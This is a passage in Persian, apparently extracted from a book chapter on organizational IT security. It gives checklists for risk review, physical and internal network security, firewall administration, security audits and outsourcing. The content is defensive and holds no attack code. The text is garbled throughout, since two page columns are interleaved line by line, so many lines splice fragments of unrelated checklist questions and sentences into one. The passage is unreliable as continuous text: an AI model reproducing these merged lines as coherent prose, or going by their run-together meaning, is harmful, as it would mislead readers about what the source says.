ﺁﻳﺎ ﻛﺴﻲ ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺳﻴﺎﺳـﺘﻬﺎ ﺑـﺮ ﻋﻬـﺪﺓ ﺍﻭﺳـﺖ ﺩﺭ •
ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﻭ ﺧﺴﺎﺭﺍﺕ ﺍﺗﻔﺎﻗﻲ ﻣﻨﺠﺮ ﻣﻲﺷﻮﻧﺪ -ﭘـﺮﺩﺍﺧﺘﻴﻢ.
ﻛﻨﻔﺮﺍﻧﺴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺷﺮﻛﺖ ﻣـﻲﻛﻨـﺪ ﻭ ﺩﺍﻧـﺶ ﺍﻣﻨﻴﺘـﻲ
ﭼﻨﺎﻧﻜﻪ ﺩﺭ ﺁﻥ ﻣﺒﺎﺣﺚ ﺩﻳﺪﻳﻢ ،ﻃﺮﺡ ﻭﺍﻛﻨﺶ ﺷﺎﻣﻞ ﻓﻬﺮﺳـﺘﻲ ﺍﺯ
ﺧﻮﺩ ﺭﺍ ﺑﻪﺭﻭﺯ ﻧﮕﻪ ﻣﻲﺩﺍﺭﺩ؟
ﻧﺘﺎﻳﺞ ﺍﺭﺯﺷﻴﺎﺑﻲ ﻋﻤﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﻮﺭﺩ ﺩﺍﺭﺍﺋﻴﻬﺎ ﺍﺳﺖ ﻭ ﻃﻴﻔـﻲ ﺍﺯ
ﺁﻳﺎ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﺑﻪ ﺑﺎﺯﺑﻴﻨﻲ ﻣﻲﭘﺮﺩﺍﺯﻳـﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ • ﺍﻗﺪﺍﻣﺎﺕ ﺗﺪﺍﻓﻌﻲ ﺍﻭﻟﻴﻪ ﺭﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨﺪ.
ﺷﻮﻳﺪ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻫﻤﭽﻨﺎﻥ ﭘﺎﺑﺮﺟﺎ ﻫﺴﺘﻨﺪ؟
ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺯﻳﺮ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮﻱ ﺭﺍ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺍﺭﺯﻳـﺎﺑﻲ
ﺁﻳﺎ ﻣﻄﻤﺌﻦ ﻫﺴﺘﻴﺪ ﺗﻤﺎﻡ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷـﻤﺎ • ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺯﻳﺎﻥ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ.
ﺭﺍ ﻧﺼﺐ ﻣﻲﻛﻨﻨـﺪ ﻃﺒـﻖ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻭ ﺭﻭﺍﻟﻬـﺎ ﺍﻣﻨﻴﺘـﻲ
١٨٩
ﺷﺮﻛﺖ ﺷﻤﺎ ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻧﺪ؟ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺑﺎﺯﻧﮕﺮﻱ ﻣﺨﺎﻃﺮﺍﺕ
ﺁﻳــﺎ ﭘــﻴﺶ ﺍﺯ ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﻧــﺮﻡﺍﻓــﺰﺍﺭﻱ ﻭ • ﺁﻳﺎ ﺍﺧﻴﺮﹰﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﺻﻮﺭﺕ ﮔﺮﻓﺘـﻪ ﺍﺳـﺖ؟ ﺍﻳـﻦ •
ﻲ
ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ،ﺍﺯ ﺭﻓﻊ ﻭ ﺭﺟﻮﻉ ﺗﻤـﺎﻡ ﻣـﺸﻜﻼﺕ ﺍﻣﻨﻴﺘـ ﹺ ﺍﺭﺯﻳﺎﺑﻲ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ ﺑﻪﺭﻭﺯ ﻣﻲﺷﻮﺩ؟
ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻣﻲﻛﻨﻴﺪ؟ ﺁﻳﺎ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺮ ﺣﺴﺐ ﺣﺴﺎﺳﻴﺖ ﻣﺨﺎﻃﺮﺍﺕ )ﻏﻴﺮﺣـﺴﺎﺱ، •
ﺁﻳﺎ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺑﺎﺯﺑﻴﻨﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗـﺮﺍﺭ ﻣـﻲﺩﻫﻴـﺪ؟ • ﺣﺴﺎﺱ ،ﻭ ﺑﺴﻴﺎﺭ ﺣﺴﺎﺱ( ﺗﻘﺴﻴﻢﺑﻨﺪﻱ ﺷﺪﻩﺍﻧﺪ؟
ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟ ﺁﻳﺎ ﺍﻫﺪﺍﻑ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺮ ﺍﺳﺎﺱ ﺍﺻﻮﻝ ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ؟ •
ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ :ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ ﺁﻳﺎ ﺑﺮﺍﻱ ﺁﺯﻣﻮﺩﻥ ﻧﺘﺎﻳﺞ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﺍﺕ ،ﺑﺎﺯﺑﻴﻨﻴﻬـﺎﻱ •
ﻣﻨﻈﻢ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴﺮﺩ؟
ﻣﺒﺤــﺚ ﺍﻣﻨﻴــﺖ ﻓﻴﺰﻳﻜــﻲ ﺩﺭ ﺳــﻄﻮﺡ ﻣﺨﺘﻠﻔــﻲ ﺍﺯ ﺟﺰﺋﻴــﺎﺕ ﺩﺭ
ﺁﻳﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ •
ﺑﺨﺸﻬﺎﻱ ﺩﻭﻡ )ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﻧﻔـﺮﺍﺩﻱ( ،ﺳـﻮﻡ
ﻛــﺎﻫﺶ ﺩﺍﺩﻩ ﺷــﻮﻧﺪ ،ﺍﺯ ﻣﻤﻴﺰﻫــﺎﻱ ﺧــﺎﺭﺝ ﺍﺯ ﺳــﺎﺯﻣﺎﻥ
)ﻫﻤﻴﻦ ﺑﺨﺶ( ﻭ ﭘﻨﺠﻢ )ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺭﺍﻫﺒـﺮﺍﻥ ﻭ ﻓﻨـﻲ(
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؟
ﭘﻮﺷﺶ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ .ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﻓﻨﻲ ،ﺑﻌﻀﻲ ﺯﻣﻴﻨﻪﻫﺎ ﺑﺎﻳـﺪ ﺍﺯ
ﻣﻨﻈﺮ ﺍﻣﻨﻴﺘﻲ ﺗﺤﺖ ﭘﻮﺷﺶ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ؛ ﻣﺜﻞ ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ، ﺁﻳﺎ ﺗﻤﺎﻡ ﻛﺎﺭﻣﻨـﺪﺍﻥ )ﺣﺘـﻲ ﻣـﺪﻳﺮﺍﻥ ﻭ ﺭﺍﻫﺒـﺮﺍﻥ ﺳﻴـﺴﺘﻢ( ﺑـﺮ •
ﺷﺒﻜﻪﻫﺎﻱ ﺧﺎﺭﺟﻲ ،ﻭ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪﻫﺎ .ﻓﻬﺮﺳﺘﻬﺎﻱ ﺍﺳﺎﺱ ﺍﻫﺪﺍﻑ ﺍﻣﻨﻴﺘـﻲ ﻣـﻮﺭﺩ ﺍﺭﺯﺷـﻴﺎﺑﻲ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪ ﻭ
ﻛﻨﺘﺮﻝ ﺯﻳﺮ ﺟﻬﺖ ﻛﻤﻚ ﺑﻪ ﺣﻔﻆ ﻣﻨﺎﺑﻊ ﻓﻴﺰﻳﻜـﻲ ﻳـﻚ ﻣﺤـﻴﻂ ﻣﻨﺼﻮﺏ ﺷﺪﻩﺍﻧﺪ؟
ﺷﺒﻜﻪﺍﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ.
۱۹۰ﻫﻤﺎﻥ ﻣﻨﺒﻊ ،ﻓﺼﻞ ﺩﻭﻡ ،ﺍﻣﻨﻴﺖ ﻣﺒﺘﻜﺮﺍﻧﻪ ،ﺹ ۳۲ ۱۸۹ﻫﻤﺎﻥ ﻣﻨﺒﻊ ،ﻓﺼﻞ ﺷﺸﻢ ،ﺍﻣﻨﻴﺖ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻧﺸﺪﻩ ،ﺹ ۹۵
٢٠١ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺁﻳﺎ ﻛﺴﻲ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻧﺠﺎﻡ ﺁﺯﻣﻮﻥ ﻧﻔـﻮﺫ ١٩٣ﺭﻭﻱ ﺩﻳـﻮﺍﺭﺓ • ١٩١
ﻓﻬﺮﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ
ﺁﺗﺶ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ؟
ﺁﻳﺎ ﺑﺮﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻤﻬﺎ ،ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻌﻴﻦ •
ﺁﻳﺎ ﻣﺸﺨﺺ ﺍﺳﺖ ﻛﻪ ﻣـﺴﺌﻮﻟﻴﺖ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺩﻳـﻮﺍﺭﺓ • ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
ﺁﺗﺶ )ﺩﺭﺻﻮﺭﺕ ﻟﺰﻭﻡ( ﺑﺮ ﻋﻬﺪﺓ ﻛﻴﺴﺖ؟
ﺁﻳﺎ ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎ ﺷﺎﻣﻞ ﻣﺠﻮﺯﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ •
ﺁﻳﺎ ﺑﺮﺍﻱ ﺍﻣﻮﺭ ﺭﺍﻫﺒﺮﻱ ،ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ،ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺩﻳـﻮﺍﺭﺓ • ﻓﺎﻳﻠﻬﺎ ،ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ،ﻭ ﻭﺻﻠﻪﻫﺎ ﻣﻲﺷﻮﻧﺪ؟
ﺁﺗﺶ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ؟
ﺁﻳﺎ ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻩﺍﻳﺪ؟ •
ﺁﻳﺎ ﻣﺪﻳﺮﺍﻥ ﺑـﻪ ﻧﻘـﺶ ﺧـﻮﺩ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ ﺍﻣﻨﻴـﺖ ﻭ ﻧﻘـﺶ •
ﺁﻳﺎ ﺳﻴﺎﺳﺘﻲ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟ •
ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﮔﺰﺍﺭﺵ ﻣﻲﺩﻫﻨﺪ ﻭﺍﻗﻔﻨﺪ؟
ﺁﻳﺎ ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺍﺭﻧﺪ؟ •
ﺁﻳﺎ ﻧﻘﺸﻬﺎ ﻭ ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻓـﻮﺭﻳﺘﻲ ﺑﻮﺿـﻮﺡ ﻭ ﺑـﺼﻮﺭﺕ •
ﺭﺳﻤﻲ ﺗﻌﺮﻳﻒ ﺷﺪﻩﺍﻧﺪ؟ ﺁﻳﺎ ﺣﺴﺎﺑﻬﺎﻱ ﭘﻴﺶﻓﺮﺽ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﻣﻮﺟﻮﺩ ﻫـﺴﺘﻨﺪ •
ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ؟
ﺁﻳﺎ ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺨـﺶ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺭﻭﺍﻟﻬـﺎﻱ ﭘﻴـﺸﮕﻴﺮﺍﻧﺔ •
ﻣﻌﻴﻨﻲ ﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ؟ ﺁﻳﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﭘﻴﺶﻓـﺮﺽ ""Guest •
ﺑﺨﺶ ﺳﻮﻡ
١٩٤
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺭﻭﺍﻟﻬﺎﻱ ﺑﺎﺯﺑﻴﻨﻲ ﺁﻳﺎ ﺷﺮﻛﺖ ﺑـﺮﺍﻱ ﻛﻨﺘـﺮﻝ ﺍﺗـﺼﺎﻻﺕ ﺧـﺎﺭﺟﻲ ﺑـﺼﻮﺭﺕ •
ﻣﻨﻈﻢ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎﺯﺑﻴﻨﻲ ﻣﻲﻛﻨﺪ؟
ﺁﻳﺎ ﻳﻚ ﺳﻴﺎﺳﺖ ﺭﺳﻤﻲ ﺑﺮﺍﻱ ﺑﺎﺯﺑﻴﻨﻲ ﺩﺍﺭﻳﺪ؟ •
ﺁﻳﺎ ﺑﺮﺍﻱ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺍﺗـﺼﺎﻝ ﺍﻓـﺮﺍﺩ ﻳـﺎ ﭘﻴﻤﺎﻧﻜـﺎﺭﺍﻥ •
ﺁﻳﺎ ﺑﺮﺍﻱ ﺁﺯﻣﻮﻥ ﺍﻣﻨﻴﺖ ،ﺭﻭﺍﻟﻬـﺎﻱ ﻛﺘﺒـﻲ ﺑـﺎﺯﺑﻴﻨﻲ ﺗﻬﻴـﻪ •
ﻣﺴﺘﻌﻔﻲ ،ﺭﻭﺍﻝ ﺧﺎﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
ﻛﺮﺩﻩﺍﻳﺪ؟
ﺁﻳــﺎ ﺑــﺮﺍﻱ ﻧــﺼﺐ ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ،ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ •
ﺁﻳﺎ ﺑﺎﺯﺑﻴﻨﻲﻫﺎ ﻃﺒﻖ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﻨﻈﻢ ﺯﻣـﺎﻧﻲ ﺑـﻪ ﺍﻧﺠـﺎﻡ •
ﻣﺨﺼﻮﺹ ﻣﻮﺟﻮﺩ ﺍﺳﺖ؟
ﻣﻲﺭﺳﻨﺪ؟
ﺁﻳﺎ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺗﺼﺎﻻﺕ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﻪ ﺷـﺒﻜﻪﻫـﺎﻱ •
ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺎﺯﺑﻴﻨﻲ ﺭﻭﻱ ﻫﻤﺔ ﺍﻧـﻮﺍﻉ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ •
ﺧﺎﺭﺟﻲ ﺳﻴﺎﺳﺖ ﻭ ﺭﻭﺍﻝ ﺧﺎﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
ﺷﻤﺎ ) (Unix/Linux, Mac, Windowsﻧﺼﺐ ﺷﺪﻩﺍﻧﺪ؟
ﺁﻳــﺎ ﻫﻤــﺔ ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﺍﺗــﺼﺎﻻﺕ •
ﺁﻳﺎ ﺑﺮﺍﻱ ﺧﺮﻳـﺪ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺑـﺎﺯﺑﻴﻨﻲ ،ﺑﻮﺩﺟـﺔ •
ﺑﺼﻮﺭﺕ ﺍﺟﺒﺎﺭﻱ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﻧﺪ؟
ﻣﻨﺎﺳﺐ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ؟
ﺁﻳﺎ ﻣﺪﻳﺮﺍﻥ ﺑﺎ ﻓـﺮﺍﻫﻢ ﻛـﺮﺩﻥ ﺍﻣﻜـﺎﻥ ﺁﻣـﻮﺯﺵ ﺻـﺤﻴﺢ • ﺑﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺖ
ﻣﻤﻴﺰﺍﻥ ،ﺍﺯ ﻓﺮﺁﻳﻨـﺪ ﺑـﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴـﺖ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣﻨﺎﺳـﺐ
ﺩﺭ ﻋﻴﻦ ﺍﻳﻨﻜﻪ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻘـﺎﺩﻳﺮ ﻫﻨﮕﻔﺘـﻲ ﺯﻣـﺎﻥ ﻭ ﭘـﻮﻝ ﺭﺍ
ﺑﻌﻤﻞ ﻣﻲﺁﻭﺭﻧﺪ؟
ﺟﻬﺖ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﺁﻣﻮﺯﺵ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻭ
ﺗﻮﺟــﻪ ﺑــﻪ ﻣــﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﺍﻣﻨﻴﺘــﻲ ﺻــﺮﻑ ﻣــﻲﻛﻨــﺪ،
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ
ﺍﺛﺮﺑﺨﺸﻲ ﺍﻳﻦ ﺗﻼﺷﻬﺎ ﻧﻴﺰ ﻟﺤﻈﻪ ﺑﻪ ﻟﺤﻈﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﺍﺭﺯﻳـﺎﺑﻲ
ﻧﻬﺎﻳﺘﹰﺎ ﺑﻪ ﺍﻳﻦ ﺍﻣﺮ ﻭﺍﻗﻔﻴﻢ ﻛﻪ ﭘﻴﭽﻴﺪﮔﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺑﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺘﻲ ،ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻧﻘﺎﻁ ﺿﻌﻒ ﺑﺮﻧﺎﻣﺔ ﺟـﺎﻣﻊ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻛﻪ ﺑﺎ ﺭﺷﺪ ﻭ ﺗﻐﻴﻴﺮ ﺩﺭ ﻃﻮﻝ ﻋﻤﺮ ﺳﺎﺯﻣﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺧﺎﺭﺟﻲ ﻭﺍﺩﺍﺭ ﻛﻨﺪ .ﺩﺭ ﻓﺼﻠﻲ ﻛﻪ ﺑﻪ ﺍﻳـﻦ ﻭ ﻳﺎ ﺑﻪ ﻫﺮ ﺗﺮﺗﻴﺐ ﻧﻤﻲﺗﻮﺍﻧﺴﺘﻪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﺭﺍ ﺁﺷـﻜﺎﺭ
ﻣﻔﻬﻮﻡ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﻧﻜﺎﺕ ﻗﺎﺑـﻞ ﺗﻮﺟـﻪ ﺩﺭ ﻣﻲﻛﻨﺪ .ﺑﺎﺯﺑﻴﻨﻲﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻳﻚ ﻣﺰﻳﺖ ﺩﻳﮕـﺮ ﻧﻴـﺰ ﺑـﻪ ﻫﻤـﺮﺍﻩ
ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺖ ﻫﻤﻜﺎﺭ ،ﭼﮕـﻮﻧﮕﻲ ﻣـﺪﻳﺮﻳﺖ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺁﻥ ،ﻭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﺁﻥ ﺍﻳﻨﻜـﻪ ﺍﮔـﺮ ﻣﺘﺨﻠﻔـﺎﻥ ﺑﺪﺍﻧﻨـﺪ ﻛـﻪ ﺷـﻤﺎ ﺩﺭ
ﺍﻳﻨﻜﻪ ﭼﻪ ﻫﻨﮕﺎﻡ ﺑﺎﻳﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﻧﺮﺍ ﺑﻪ ﺩﻗﺖ ﺯﻳـﺮ ﻧﻈـﺮ ﮔﺮﻓـﺖ ﺟﺴﺘﺠﻮﻱ ﺁﻧﺎﻥ ﻫﺴﺘﻴﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻓﻌﺎﻟﻴـﺖ ﺧـﻮﺩ ﺭﺍ ﻣﺤـﺪﻭﺩ
ﺑﺤﺚ ﻋﻤﻴﻘﻲ ﺻﻮﺭﺕ ﮔﺮﻓﺖ. ﻛﻨﻨﺪ.
ﻓﻬﺮﺳﺖ ﺍﻣﻨﻴﺖ ﺯﻳﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻣﻨﺒـﻊ ﺩﻳﮕـﺮ ﺑـﺮﺍﻱ ﻣﻌﻤﻮﻝﺗﺮﻳﻦ ﺍﺷﺘﺒﺎﻫﺎﺗﻲ ﻛﻪ ﺑﺎ ﺭﻭﺍﻟﻬـﺎﻱ ﻣﻤﻴـﺰﻱ ﺍﻣﻨﻴـﺖ ﻗﺎﺑـﻞ
ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﺎﻳﻠﻨﺪ ﺍﺯ ﻳﻚ ﭘﻴﻤﺎﻧﻜـﺎﺭ ﺧـﺎﺭﺟﻲ ﺟﻬـﺖ ﺍﻧﺠـﺎﻡ ﺷﻨﺎﺳﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ:
ﻧﺼﺐ ﻧﺒﻮﺩﻥ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ؛ •
ﻓﻬﺮﺳــﺖ ﻛﻨﺘــﺮﻝ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨــﺎﺑﻊ ﺧــﺎﺭﺟﻲ ﺩﺭ ﻣﺠﻮﺯ ﺩﺳﺘﺮﺳﻲ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﺑﻪ ﻓﺎﻳﻠﻬﺎ؛ •
ﺍﻣﻨﻴﺖ) ١٩٥ﻣﻼﺣﻈﺎﺕ ﻓﻨﻲ( ﺳﺎﺩﻩ ﻭ ﻗﺎﺑﻞ ﺣﺪﺱ ﺑﻮﺩﻥ ﺭﻣﺰ ﻋﺒﻮﺭ؛ •
ﺁﻳﺎ ﺍﺗﺼﺎﻻﺕ ﻣﻴﺎﻥ ﺍﺭﺍﺋﻪﻛﻨﻨـﺪﮔﺎﻥ ﻭ ﻣـﺸﺘﺮﻳﺎﻥ )ﺍﺗـﺼﺎﻻﺕ • ﻓﻌﺎﻝ ﺑﻮﺩﻥ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﻏﻴﺮﺿﺮﻭﺭﻱ؛ ﻭ •
ﺷﺒﻜﻪﻫﺎﻱ ﺧﺎﺭﺟﻲ( ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﺑﺎﺯﺑﻴﻨﻲ ﻣـﻲﺷـﻮﺩ؟ ﻫـﺮ ﺭﻭﺷﻦ ﻧﺒﻮﺩﻥ ﻳﺎ ﺍﻋﻤﺎﻝ ﻧﺸﺪﻥ ﻗﻮﺍﻧﻴﻦ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ. •
ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺯﻳﺮ ﺟﻬﺖ ﺗﻌﻴﻴﻦ ﻳﻚ ﻣﺒﻨﺎ ﺑﺮﺍﻱ ﺑـﺎﺯﺑﻴﻨﻲﻫـﺎﻱ
ﺍﻣﻨﻴﺘﻲ -ﭼﻪ ﺗﻮﺳﻂ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺷﺮﻛﺖ ﻭ ﭼﻪ ﺗﻮﺳﻂ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ
ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ -ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ.
۱۹۴ﻣﻨﺒﻊ ،ITS :ﻓﺼﻞ ﻧﻬﻢ ،ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣﻮﺭ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ،ﺹ ۱۳۳
۱۹۵ﻣﻨﺒﻊ ،ITS :ﻓﺼﻞ ﻧﻬﻢ ،ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣﻮﺭ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ،ﺹ ۱۳۳
